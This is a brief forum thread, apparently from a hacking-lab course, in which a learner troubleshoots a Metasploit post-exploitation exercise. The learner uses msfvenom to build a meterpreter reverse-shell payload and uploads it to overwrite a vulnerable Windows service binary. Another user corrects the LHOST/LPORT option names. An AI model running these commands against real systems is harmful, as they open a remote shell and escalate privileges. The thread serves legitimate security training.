Forum Discussion
pwn6394
Bronze I
23 days agoEp 7 Post Exploitation With Metasploit
I’m having issues with q9 and don’t know why what I’m currently doing isn’t working. I’ve ran SharpUp.exe and found a vulnerable binary location (C:/Windows/Important-Service/Important-Service.exe)....
- 10 days ago
Erm, shouldn't those be LHOST/LPORT?
pwn6394
Bronze I
19 days agoThanks for getting back to me. As far as I’m aware, my upload is going to the correct directory. I’m using the following command in my meterpreter session, with my msfvenom payload the same as you mention. I’ll have another play later on; it’s most likely not being uploaded to the correct location, as I don’t get an overwrite prompt. Thank you.
upload Important-Service.exe C:/Windows/Important-Service/Important-Service.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp RPORT=1234 RHOSTS=10.102.118.165 -f exe -o Important-Service.exe